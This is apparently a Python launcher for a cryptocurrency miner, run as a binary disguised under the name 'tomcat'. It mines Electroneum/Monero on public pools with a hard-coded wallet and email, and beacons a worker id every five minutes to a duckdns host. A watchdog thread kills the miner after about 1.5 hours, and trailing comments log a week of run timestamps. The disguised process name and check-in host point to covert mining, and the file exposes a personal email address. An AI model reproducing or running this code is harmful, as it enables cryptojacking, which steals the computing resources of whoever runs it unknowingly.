import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:35:08.228738
#2018-02-17 16:21:06.970063
#2018-02-17 18:10:04.598784
#2018-02-17 19:57:04.028562
#2018-02-17 21:44:07.157800
#2018-02-17 23:28:06.288361
#2018-02-18 01:18:05.964435
#2018-02-18 03:05:08.996553
#2018-02-18 04:52:06.700683
#2018-02-18 06:42:01.856597
#2018-02-18 08:31:03.736025
#2018-02-18 10:18:07.791991
#2018-02-18 12:04:03.111944
#2018-02-18 13:49:01.254775
#2018-02-18 15:41:07.583564
#2018-02-18 17:31:04.839592
#2018-02-18 19:18:04.662770
#2018-02-18 21:04:01.832450
#2018-02-18 22:51:01.374597
#2018-02-19 00:39:01.970909
#2018-02-19 02:24:01.651412
#2018-02-19 04:11:02.188291
#2018-02-19 05:55:06.934220
#2018-02-19 07:43:04.689511
#2018-02-19 09:32:05.411514
#2018-02-19 11:22:01.460998
#2018-02-19 13:08:07.051604
#2018-02-19 14:57:08.643405
#2018-02-19 16:48:08.321910
#2018-02-19 18:35:01.888045
#2018-02-19 20:22:07.338820
#2018-02-19 22:12:08.746511
#2018-02-19 23:57:07.330543
#2018-02-20 01:45:11.751040
#2018-02-20 03:34:04.892688
#2018-02-20 05:21:04.406223
#2018-02-20 07:05:04.818329
#2018-02-20 08:50:08.004788
#2018-02-20 10:34:08.797169
#2018-02-20 12:19:08.098257
#2018-02-20 14:07:01.247752
#2018-02-20 15:53:06.110464
#2018-02-20 17:40:03.133166
#2018-02-20 19:28:02.068551
#2018-02-20 21:02:07.187431
#2018-02-20 22:35:06.968187
#2018-02-21 00:04:04.771939
#2018-02-21 01:42:05.068115
#2018-02-21 03:17:06.541350
#2018-02-21 04:51:06.505463
#2018-02-21 06:26:05.556228
#2018-02-21 07:57:05.178710
#2018-02-21 09:32:01.767710
#2018-02-21 11:11:05.481909
#2018-02-21 12:41:07.714147
#2018-02-21 14:15:06.296263
#2018-02-21 15:48:06.315931
#2018-02-21 17:28:09.569578
#2018-02-21 19:00:08.120574
#2018-02-21 20:34:05.372267
#2018-02-21 22:17:05.483049
#2018-02-21 23:53:07.509937
#2018-02-22 01:29:04.159319
#2018-02-22 03:04:01.951908
#2018-02-22 04:33:04.087211
#2018-02-22 06:06:06.209743
#2018-02-22 07:39:06.477845
#2018-02-22 09:15:01.560312
#2018-02-22 10:47:11.140209
#2018-02-22 12:18:08.908619
#2018-02-22 13:51:05.634418
#2018-02-22 15:29:04.504085
#2018-02-22 16:57:07.247372
#2018-02-22 18:36:05.364146
#2018-02-22 20:12:02.043959
#2018-02-22 21:43:01.463154
#2018-02-22 23:12:04.413687
#2018-02-23 00:48:08.659360
#2018-02-23 02:20:06.930148
#2018-02-23 03:54:06.267332
#2018-02-23 05:38:07.100920
#2018-02-23 07:23:01.619538
#2018-02-23 09:27:03.913646
#2018-02-23 11:34:02.148142
#2018-02-23 13:25:06.758142
#2018-02-23 15:12:04.897424
#2018-02-23 17:02:05.905197
#2018-02-23 18:51:01.506428
#2018-02-23 20:37:07.779063
#2018-02-23 22:24:01.576260
#2018-02-24 00:10:09.653071
#2018-02-24 02:02:05.705408
#2018-02-24 03:58:06.631801
#2018-02-24 05:44:03.428997
#2018-02-24 07:36:06.383725
#2018-02-24 09:21:06.875485
#2018-02-24 11:15:05.903011
#2018-02-24 13:04:04.941366
#2018-02-24 14:52:07.080177
#2018-02-24 16:43:03.485784
#2018-02-24 18:31:06.332942
#2018-02-24 20:18:06.113185
#2018-02-24 22:12:06.804051
#2018-02-25 01:09:05.080660
#2018-02-25 04:49:03.823630
#2018-02-25 09:15:04.130641